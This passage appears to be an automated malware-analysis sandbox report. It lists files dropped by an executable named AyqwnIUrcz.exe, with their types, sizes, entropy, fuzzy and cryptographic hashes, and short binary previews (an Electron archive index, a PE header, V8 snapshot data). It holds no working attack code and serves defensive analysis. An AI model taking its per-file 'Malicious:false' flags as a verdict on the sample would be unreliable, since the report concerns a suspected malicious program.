                                                                                                                                                                      SHA-512:C94791D6B84200B302073B09357ABD2A1D7576B068BAE01DCCDA7BC154A6487145C83C9133848CCF4CB9E6DC6C5A9D4BE9D818E5A0C8F440A4E04AE8EABD4A29
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):395064
                                                                                                                                                                      Entropy (8bit):5.365550895872654
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:9V01rV7gSsX5SEHDpaQe3D+qnRVd5qYx1Gp7KhaPW:96NFgSsX5S1V7d5qYx1Gp7KcPW
                                                                                                                                                                      MD5:181D2A0ECE4B67281D9D2323E9B9824D
                                                                                                                                                                      SHA1:E8BDC53757E96C12F3CD256C7812532DD524A0EA
                                                                                                                                                                      SHA-256:6629E68C457806621ED23AA53B3675336C3E643F911F8485118A412EF9ED14CE
                                                                                                                                                                      SHA-512:10D8CC9411CA475C9B659A2CC88D365E811217D957C82D9C144D94843BC7C7A254EE2451A6F485E92385A660FA01577CFFA0D64B6E9E658A87BEF8FCCBBEAF7E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):439920
                                                                                                                                                                      Entropy (8bit):5.766175831058526
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:f2jujSo9/D+Xgv3iWGb1vPiCUdhUo3Ymhz1QhjAB5cUE447e:Sc3N1Qhw5me
                                                                                                                                                                      MD5:18D49D5376237BB8A25413B55751A833
                                                                                                                                                                      SHA1:0B47A7381DE61742AC2184850822C5FA2AFA559E
                                                                                                                                                                      SHA-256:1729AA5C8A7E24A0DB98FEBCC91DF8B7B5C16F9B6BB13A2B0795038F2A14B981
                                                                                                                                                                      SHA-512:45344A533CC35C8CE05CF29B11DA6C0F97D8854DAE46CF45EF7D090558EF95C3BD5FDC284D9A7809F0B2BF30985002BE2AA6A4749C0D9AE9BDFF4AD13DE4E570
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):415447
                                                                                                                                                                      Entropy (8bit):5.426006792591415
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:Bm1HqF4Znh9GzBtNBXBLd1OUDcpryHF55NJND0bsRzlb2:UHrnhMzX5PJB4sRxC
                                                                                                                                                                      MD5:0D9DEA9E24645C2A3F58E4511C564A36
                                                                                                                                                                      SHA1:DCD2620A1935C667737EEA46CA7BB2BDCB31F3A6
                                                                                                                                                                      SHA-256:CA7B880391FCD319E976FCC9B5780EA71DE655492C4A52448C51AB2170EEEF3B
                                                                                                                                                                      SHA-512:8FCF871F8BE7727E2368DF74C05CA927C5F0BC3484C4934F83C0ABC98ECAF774AD7ABA56E1BF17C92B1076C0B8EB9C076CC949CD5427EFCADE9DDF14F6B56BC5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):416977
                                                                                                                                                                      Entropy (8bit):5.401132911995885
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:isWkrPyGJeOMqieJVJJxhlOlxLu3ov5xKqSR0B:X3PBxj8zv5xKqSRW
                                                                                                                                                                      MD5:6A7232F316358D8376A1667426782796
                                                                                                                                                                      SHA1:8B70FE0F3AB2D73428F19ECD376C5DEBA4A0BB6C
                                                                                                                                                                      SHA-256:6A526CD5268B80DF24104A7F40F55E4F1068185FEBBBB5876BA2CB7F78410F84
                                                                                                                                                                      SHA-512:40D24B3D01E20AE150083B00BB6E10BCA81737C48219BCE22FA88FAAAD85BDC8C56AC9B1EB01854173B0ED792E34BDFBAC26D3605B6A35C14CF2824C000D0DA1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):430191
                                                                                                                                                                      Entropy (8bit):5.460617985170646
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:pqgw32K4aoFt3GgnSYn0vLi5OU6ois2a/7ulqr:pqgVzFt3GgnSY0vLi5OXo3/5r
                                                                                                                                                                      MD5:99EAA3D101354088379771FD85159DE1
                                                                                                                                                                      SHA1:A32DB810115D6DCF83A887E71D5B061B5EEFE41F
                                                                                                                                                                      SHA-256:33F4C20F7910BC3E636BC3BEC78F4807685153242DD4BC77648049772CF47423
                                                                                                                                                                      SHA-512:C6F87DA1B5C156AA206DC21A9DA3132CBFB0E12E10DA7DC3B60363089DE9E0124BBAD00A233E61325348223FC5953D4F23E46FE47EC8E7CA07702AC73F3FD2E9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):703696
                                                                                                                                                                      Entropy (8bit):4.836890612319527
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:ckXRY5eXN2hHO3j/jHXzvMBsiA2kkce8P/XyFGGJGswfaZ/LeUFCcYWIkHWajf+F:ck5LZ5w6pF
                                                                                                                                                                      MD5:AB9902025DCF7D5408BF6377B046272B
                                                                                                                                                                      SHA1:C9496E5AF3E2A43377290A4883C0555E27B1F10F
                                                                                                                                                                      SHA-256:983B15DCC31D0E9A3DA78CD6021E5ADD2A3C2247322ADED9454A5D148D127AAE
                                                                                                                                                                      SHA-512:D255D5F5B6B09AF2CDEC7B9C171EEBB1DE1094CC5B4DDF43A3D4310F8F5F223AC48B8DA97A07764D1B44F1D4A14FE3A0C92A0CE6FE9A4AE9A6B4A342E038F842
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):443094
                                                                                                                                                                      Entropy (8bit):5.818852266406701
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:vQt/WMWyqiLJcPXPk5ELALWaQlKDEmLFGR:vQYfyqiWPXM5ELALWaQlwdLE
                                                                                                                                                                      MD5:C6C7396DBFB989F034D50BD053503366
                                                                                                                                                                      SHA1:089F176B88235CCE5BCA7ABFCC78254E93296D61
                                                                                                                                                                      SHA-256:439F7D6C23217C965179898754EDCEF8FD1248BDD9B436703BF1FF710701117A
                                                                                                                                                                      SHA-512:1476963F47B45D2D26536706B7EEBA34CFAE124A3087F7727C4EFE0F19610F94393012CDA462060B1A654827E41F463D7226AFA977654DCD85B27B7F8D1528EB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):427791
                                                                                                                                                                      Entropy (8bit):5.48540289392965
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:iyCeC3SMQRB21BPDwY5oEcAVOlJgi/fzxzqg:iTJ6kDwY5oEc0i/fzxt
                                                                                                                                                                      MD5:D4BD9F20FD29519D6B017067E659442C
                                                                                                                                                                      SHA1:782283B65102DE4A0A61B901DEA4E52AB6998F22
                                                                                                                                                                      SHA-256:F33AFA6B8DF235B09B84377FC3C90403C159C87EDD8CD8004B7F6EDD65C85CE6
                                                                                                                                                                      SHA-512:ADF8D8EC17E8B05771F47B19E8027F88237AD61BCA42995F424C1F5BD6EFA92B23C69D363264714C1550B9CD0D03F66A7CFB792C3FBF9D5C173175B0A8C039DC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):660194
                                                                                                                                                                      Entropy (8bit):4.761695251077794
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:oLNvoUKEuNI0I4Ki1eg82ATs+Hc549x4moW037LJzk/k/N:xrnqJc5Axjw
                                                                                                                                                                      MD5:CBB817A58999D754F99582B72E1AE491
                                                                                                                                                                      SHA1:6EC3FD06DEE0B1FE5002CB0A4FE8EC533A51F9FD
                                                                                                                                                                      SHA-256:4BD7E466CB5F5B0A451E1192AA1ABAAF9526855A86D655F94C9CE2183EC80C25
                                                                                                                                                                      SHA-512:EFEF29CEDB7B08D37F9DF1705D36613F423E994A041B137D5C94D2555319FFB068BB311884C9D4269B0066746DACD508A7D01DF40A8561590461D5F02CB52F8B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):385361
                                                                                                                                                                      Entropy (8bit):5.543491670458518
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:M4pITVzssdlJ9EAjiws8cB7xjpZ/4LLXru9M9SOxDE/xUDvZv5pB5mEgb7:BpIXzJ9V2B1q5/5mz
                                                                                                                                                                      MD5:502E4A8B3301253ABE27C4FD790FBE90
                                                                                                                                                                      SHA1:17ABCD7A84DA5F01D12697E0DFFC753FFB49991A
                                                                                                                                                                      SHA-256:7D72E3ADB35E13EC90F2F4271AD2A9B817A2734DA423D972517F3CFF299165FD
                                                                                                                                                                      SHA-512:BD270ABAF9344C96B0F63FC8CEC04F0D0AC9FC343AB5A80F5B47E4B13B8B1C0C4B68F19550573A1D965BB18A27EDF29F5DD592944D754B80EA9684DBCEDEA822
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):404460
                                                                                                                                                                      Entropy (8bit):5.342349721117576
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:icM47G565vqimUwbQuBndO8gJGgnATm5A1vZcsToe4t2ht:iy7GsP5Ar
                                                                                                                                                                      MD5:39277AE2D91FDC1BD38BEA892B388485
                                                                                                                                                                      SHA1:FF787FB0156C40478D778B2A6856AD7B469BD7CB
                                                                                                                                                                      SHA-256:6D6D095A1B39C38C273BE35CD09EB1914BD3A53F05180A3B3EB41A81AE31D5D3
                                                                                                                                                                      SHA-512:BE2D8FBEDAA957F0C0823E7BEB80DE570EDD0B8E7599CF8F2991DC671BDCBBBE618C15B36705D83BE7B6E9A0D32EC00F519FC8543B548422CA8DCF07C0548AB4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1043803
                                                                                                                                                                      Entropy (8bit):4.044068430611977
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:LXNxfy+orMVjLn1ExBlhfg5yzntRMcA2i:rffyrrMFL1cB3g5yzMcA2i
                                                                                                                                                                      MD5:7006691481966109CCE413F48A349FF2
                                                                                                                                                                      SHA1:6BD243D753CF66074359ABE28CFAE75BCEDD2D23
                                                                                                                                                                      SHA-256:24EA4028DA66A293A43D27102012235198F42A1E271FE568C7FD78490A3EE647
                                                                                                                                                                      SHA-512:E12C0D1792A28BF4885E77185C2A0C5386438F142275B8F77317EB8A5CEE994B3241BB264D9502D60BFBCE9CF8B3B9F605C798D67819259F501719D054083BEA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):965006
                                                                                                                                                                      Entropy (8bit):4.295544641165274
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:wM9fKUyABW3p1F9SviTlw2cfgvNFOJgr/p54JVQJMwKpaJC28+58XoX0Doq9OyUk:wM9fKU6225jM9h
                                                                                                                                                                      MD5:F809BF5184935C74C8E7086D34EA306C
                                                                                                                                                                      SHA1:709AB3DECFF033CF2FA433ECC5892A7AC2E3752E
                                                                                                                                                                      SHA-256:9BBFA7A9F2116281BF0AF1E8FFB279D1AA97AC3ED9EBC80C3ADE19E922D7E2D4
                                                                                                                                                                      SHA-512:DE4B14DD6018FDBDF5033ABDA4DA2CB9F5FCF26493788E35D88C07A538B84FDD663EE20255DFD9C1AAC201F0CCE846050D2925C55BF42D4029CB78B057930ACD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):811437
                                                                                                                                                                      Entropy (8bit):4.342029978594925
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:1Jf31Mkgs3s5UWgHLRflsjj8cKGXdlogG0EeuLADh7Kle9dKj753ohP09XAyFHyJ:1Qzt5/5l
                                                                                                                                                                      MD5:2C41616DFE7FCDB4913CFAFE5D097F95
                                                                                                                                                                      SHA1:CF7D9E8AD3AA47D683E47F116528C0E4A9A159B0
                                                                                                                                                                      SHA-256:F11041C48831C93AA11BBF885D330739A33A42DB211DACCF80192668E2186ED3
                                                                                                                                                                      SHA-512:97329717E11BC63456C56022A7B7F5DA730DA133E3FC7B2CC660D63A955B1A639C556B857C039A004F92E5F35BE61BF33C035155BE0A361E3CD6D87B549DF811
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):411446
                                                                                                                                                                      Entropy (8bit):5.6133974766805546
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:y1MAG26Pl1kY1bkQq/7I5NsA7WGgeh5X/0+gi1ZavXEAQwiBvVGI:9j2Yle66s5775X/R
                                                                                                                                                                      MD5:3A858619502C68D5F7DE599060F96DB9
                                                                                                                                                                      SHA1:80A66D9B5F1E04CDA19493FFC4A2F070200E0B62
                                                                                                                                                                      SHA-256:D81F28F69DA0036F9D77242B2A58B4A76F0D5C54B3E26EE96872AC54D7ABB841
                                                                                                                                                                      SHA-512:39A7EC0DFE62BCB3F69CE40100E952517B5123F70C70B77B4C9BE3D98296772F10D3083276BC43E1DB66ED4D9BFA385A458E829CA2A7D570825D7A69E8FBB5F4
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):705061
                                                                                                                                                                      Entropy (8bit):4.868598768447113
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:wrccq9nty/KiDswU1nbx05kB3IjUUmEg5KuoLNiXElqnOyh:HGX35EEK
                                                                                                                                                                      MD5:EE70E9F3557B9C8C67BFB8DFCB51384D
                                                                                                                                                                      SHA1:FC4DFC35CDE1A00F97EEFE5E0A2B9B9C0149751E
                                                                                                                                                                      SHA-256:54324671A161F6D67C790BFD29349DB2E2D21F5012DC97E891F8F5268BDF7E22
                                                                                                                                                                      SHA-512:F4E1DA71CB0485851E8EBCD5D5CF971961737AD238353453DB938B4A82A68A6BBAF3DE7553F0FF1F915A0E6640A3E54F5368D9154B0A4AD38E439F5808C05B9F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):617109
                                                                                                                                                                      Entropy (8bit):5.143761316646653
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:LbeI8PzGSEiyqkAXsA5rzTExbWW7mQYrjuUco/9NjjFpvIx:LbDwz5qWK
                                                                                                                                                                      MD5:FF0A23974AEF88AFC86ECC806DBF1D60
                                                                                                                                                                      SHA1:E7BAE97CBB8692A0D106644DFAA9B7D7EA6FCEF0
                                                                                                                                                                      SHA-256:F245AB242AAFEEF37DB736C780476534FAD0706AA66DCB8B6B8CD181B4778385
                                                                                                                                                                      SHA-512:AABE8160FAC7E0EB8E8EB80963FE995FA4A802147D1B8F605BC0FE3F8E2474463C1D313471C11C85EB5578112232FDC8E89B8A6D43DBE38A328538FF30A78D08
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):488196
                                                                                                                                                                      Entropy (8bit):5.7988900625034185
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12288:gzLBn6cDgszBm0JXbwS1LcxzIJj758+UIi0+UELbzi830l:gpdDgsz00JrwSNizS5Hti0+UUvi830l
                                                                                                                                                                      MD5:3FE6F90F1F990AED508DEDA3810CE8C2
                                                                                                                                                                      SHA1:3B86F00666D55E984B4ACA1A5E8319FFA8F411FF
                                                                                                                                                                      SHA-256:5EEBB23221AEBCF0BE01BFC2695F7DD35B17F6769BE1E28E5610D35C9717854B
                                                                                                                                                                      SHA-512:9AA9D55F112C8B32AA636086CFD2161D97EA313CAC1A44101014128124A03504C992AC8EFD265ABA4E91787AEF7134A14507A600F5EC96FF82DF950A8883828C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):354097
                                                                                                                                                                      Entropy (8bit):6.680890808929274
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:gchsAAfyrtJw99jEaZx79+vKK4/+kTme5zBNCJ7GAmlv:gAAfyrtJAoaZ+vKK4/ye5zBNCJ7C
                                                                                                                                                                      MD5:20F315D38E3B2EDC5832931E7770B62A
                                                                                                                                                                      SHA1:2390BD585DEC1E884873454BB98B6F1467DCF7BB
                                                                                                                                                                      SHA-256:53A803724BBF2E7F40AAB860325C348F786EECA1EA5CA39A76B4C4A616E3233F
                                                                                                                                                                      SHA-512:C338E241DE3561707C7C275B7D6E0FB16185A8CD7112057C08B74FFCE122148EF693FE310C839FF93F102726A78E61DE3E68C8E324F445A07A98EE9C4FDD4E13
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):350032
                                                                                                                                                                      Entropy (8bit):6.69437398216595
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:BiwxICJkrCU2JLuRyMD+4qz5MHzCtMkZ/9ybT1:BiyS0pMD+4qz5MHzd6/o
                                                                                                                                                                      MD5:524711882CBFB5B95A63EF48F884CFF0
                                                                                                                                                                      SHA1:1078037687CFC5D038EEB8B63D295239E0EDC47A
                                                                                                                                                                      SHA-256:9E16499CD96A155D410C8DF4C812C52FF2A750F8C4DB87FD891C1E58C1428C78
                                                                                                                                                                      SHA-512:16D45A81F7F4606EDA9D12A8B1DA06E3C866B11BDC0C92A4022BFB8D02B885D8F028457CF23E3F7589DFD191ED7F7FBC68C81B6E1411834EDFCBC9CC85E0DC4D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5245458
                                                                                                                                                                      Entropy (8bit):7.995476669559971
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:98304:HLYxfQVcnNWz49PDq2AwpmqdhBh1Dd42cjrwrbHw4o0DPelwG3RC:H0pQGcMButuBhpd4jkrU4oeelrRC
                                                                                                                                                                      MD5:7D5065ECBA284ED704040FCA1C821922
                                                                                                                                                                      SHA1:095FCC890154A52AD1998B4B1E318F99B3E5D6B8
                                                                                                                                                                      SHA-256:A10C3D236246E001CB9D434A65FC3E8AA7ACDDDDD9608008DB5C5C73DEE0BA1F
                                                                                                                                                                      SHA-512:521B2266E3257ADAA775014F77B0D512FF91B087C2572359D68FFE633B57A423227E3D5AF8EE4494538F1D09AA45FFA1FE8E979814178512C37F7088DDD7995D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9070864
                                                                                                                                                                      Entropy (8bit):5.6305464135693875
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:49152:rn9CyBK3UK9tUv3UuAdFUnBUecSHNXC4215nL2S26L82ELcAJvsvRRvy4vS716D3:ryUkL
                                                                                                                                                                      MD5:194DB70CB795D8B9354688791DF0F49C
                                                                                                                                                                      SHA1:46F6B9B83C8C71C9B957B7D3AECDA421DA6E7A9A
                                                                                                                                                                      SHA-256:4DBA203171920316A3F78C343F210360F3827A26467234B0DAB3B0FA3206259F
                                                                                                                                                                      SHA-512:E160536043AB6F6BE17041BCE35065A98C4FA96801F6530C72B7AB16136C73F7093E35184CBA366C1D3EE1C2D66CD8102932D7F2730A1148CE1FE0F04895C96C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:....L+..H+..D+..{"files":{"node_modules":{"files":{"@isaacs":{"files":{"cliui":{"files":{"LICENSE.txt":{"size":731,"integrity":{"algorithm":"SHA256","hash":"2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149","blockSize":4194304,"blocks":["2dc0465729366c3a7890dfa9e972a1ba7048a26c02116fb8b419a6a1ac110149"]},"offset":"0"},"build":{"files":{"index.cjs":{"size":10398,"integrity":{"algorithm":"SHA256","hash":"820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607","blockSize":4194304,"blocks":["820aa357a7f6a022bfc3ac6ac19d1681921d0421cae898d5096423c0fb3b8607"]},"offset":"731"},"index.d.cts":{"size":1050,"integrity":{"algorithm":"SHA256","hash":"385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b","blockSize":4194304,"blocks":["385fceba2f49ee3f91cd436d3f84b389375e1e8f86906b23f47df2e1b9c2b17b"]},"offset":"11129"},"lib":{"files":{"index.js":{"size":10100,"integrity":{"algorithm":"SHA256","hash":"e67b3446f47d4a672339c99bea9e987979da9fc70f421701814cb9d52ba176
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):107520
                                                                                                                                                                      Entropy (8bit):6.442687067441468
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                                                                                                                      MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                                                                                                                      SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                                                                                                                      SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                                                                                                                      SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):273328
                                                                                                                                                                      Entropy (8bit):3.2521181832662194
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:MpeVehd7eASb6iAGm4hmWRSJTnBSki+TfUNp2Zg+TEJ0xEI2tWaw8MCZ72T04GO9:YdyNm4mWRSJTBSXsU1vJzbYB
                                                                                                                                                                      MD5:8915DD2A6D6B4EBF9A16C77FE063D8DE
                                                                                                                                                                      SHA1:A03132ADCB99A82BA269D56AB6577CCFD1BB08E5
                                                                                                                                                                      SHA-256:C1802B29B13663A8890031411270866834246931F71F41397682DD88FA16D485
                                                                                                                                                                      SHA-512:ABD93CDD634AD4D38B7E3714B183335CDDB9E3AD14660247CC7285066C95342AC8595D68CD0868B8512E73BB656AB54386045533F998576B2CD6501BF456CD2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:............11.2.214.9-electron.0............................................;...b...........:..a........a........a........ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.............................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):588152
                                                                                                                                                                      Entropy (8bit):4.83735352889622
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:bFzofuYUahtcOm3A0Tg8zY8y4XrxXSIIBYgHi:JMfu/fTY8zrM9C7
                                                                                                                                                                      MD5:4CD37EA771EA4FE2F3AD46217CC02206
                                                                                                                                                                      SHA1:31680E26869B007E62550E96DBF846B3980D5B2B
                                                                                                                                                                      SHA-256:95F7B8664306DA8D0073A795E86590ED6FDAEDE5F489132E56C8779F53CF1ED5
                                                                                                                                                                      SHA-512:E1369734CBE17AAF6DD3CEEFB57F056C5A9346D2887A7D3EE7ED177386D7F5E624407869D53902B56AB350E4DED5612C3B0F52C2DD3EFA307E9947701068A2A0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.........c~.11.2.214.9-electron.0...........................................H...P<..........X...........a........a........aT.......ar.......a........a..............Y.D............`$.........D............`$.......D............`$.......m.D............`$.........D............`D.........D............`$.......1.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....I.....@..F^......`.....(Jb....M.....@..F^..`.....H...IDa........D`....D`....D`.......D`.....D]D....D`......WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa...........WIa............L.....................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5334528
                                                                                                                                                                      Entropy (8bit):6.335261874351837
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:98304:RKJSTu+985EkjstvgsnpkkHF3y/AFIB7:RQq85EkjstvgsnpkkJETB
                                                                                                                                                                      MD5:524B0D85D992F86A7F26C162F3DBB91C
                                                                                                                                                                      SHA1:BC9C862FD01F6134A0514DCB63F9FAB7A61CE269
                                                                                                                                                                      SHA-256:5B2FFB78FA963F2DEA5A7FCF7676FC3ABA243C4372D7528C8F1FC8F726D0A3FA
                                                                                                                                                                      SHA-512:422A18AF294D7551224E05F5F4F5DCFA51B3455C2E61FC285FD2B95B50274EB77FF317647E17B0E7D47459B4FED19C7C88C90E0878F2269A78D598B1196401D8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Antivirus:
                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                      Process:C:\Users\user\Desktop\AyqwnIUrcz.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):106
                                                                                                                                                                      Entropy (8bit):4.724752649036734
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YD96WyV18tzsmyXLVi1rTVWSCwW2TJHzeZ18rY:Y8WyV18tAZLVmCwXFiZ18rY
                                                                                                                                                                      MD5:8642DD3A87E2DE6E991FAE08458E302B
                                                                                                                                                                      SHA1:9C06735C31CEC00600FD763A92F8112D085BD12A
                                                                                                                                                                      SHA-256:32D83FF113FEF532A9F97E0D2831F8656628AB1C99E9060F0332B1532839AFD9
